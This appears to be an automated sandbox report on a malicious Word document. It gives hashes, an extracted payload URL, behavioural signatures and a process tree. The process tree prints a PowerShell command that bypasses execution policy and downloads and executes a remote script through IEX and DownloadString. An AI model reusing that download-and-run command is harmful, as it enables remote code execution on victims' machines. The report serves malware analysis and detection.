Analysis
-
max time kernel
53s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
26-07-2024 21:18
Behavioral task
behavioral1
Sample
5cf13a476f1f40376b32a6fd7b866a8d1441f98cc131a8bbcebe35e7dcf0dff2.doc
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
5cf13a476f1f40376b32a6fd7b866a8d1441f98cc131a8bbcebe35e7dcf0dff2.doc
Resource
win10v2004-20240709-en
General
-
Target
5cf13a476f1f40376b32a6fd7b866a8d1441f98cc131a8bbcebe35e7dcf0dff2.doc
-
Size
34KB
-
MD5
5c2797ab79310c379e44ae2987dca9f3
-
SHA1
2fcc0edddc6274f89e03711ae40c8e5ef0bb47e9
-
SHA256
5cf13a476f1f40376b32a6fd7b866a8d1441f98cc131a8bbcebe35e7dcf0dff2
-
SHA512
6c31d93e8f3a22ce20ecfe3d6a0e2b1c72f9526b4c39a197dea6d47ffb282a00cb44768bdd57c57a2772af749d989564a4b6ec8b14f47d997a1e5cabee013a4c
-
SSDEEP
384:A3SiSwvxjk+tb/sWk+MlTT50jmtcgWFeFaJH:A3Vxw+tD7SXMgWFeFa9
Malware Config
Extracted
http://192.168.166.158/payload.txt
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2808 2804 powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 2416 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2808 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2808 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 2416 WINWORD.EXE 2416 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXEdescription pid process target process PID 2416 wrote to memory of 2688 2416 WINWORD.EXE splwow64.exe PID 2416 wrote to memory of 2688 2416 WINWORD.EXE splwow64.exe PID 2416 wrote to memory of 2688 2416 WINWORD.EXE splwow64.exe PID 2416 wrote to memory of 2688 2416 WINWORD.EXE splwow64.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5cf13a476f1f40376b32a6fd7b866a8d1441f98cc131a8bbcebe35e7dcf0dff2.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2688
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -nop -c IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.166.158/payload.txt'))1⤵
- Process spawned unexpected child process
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2808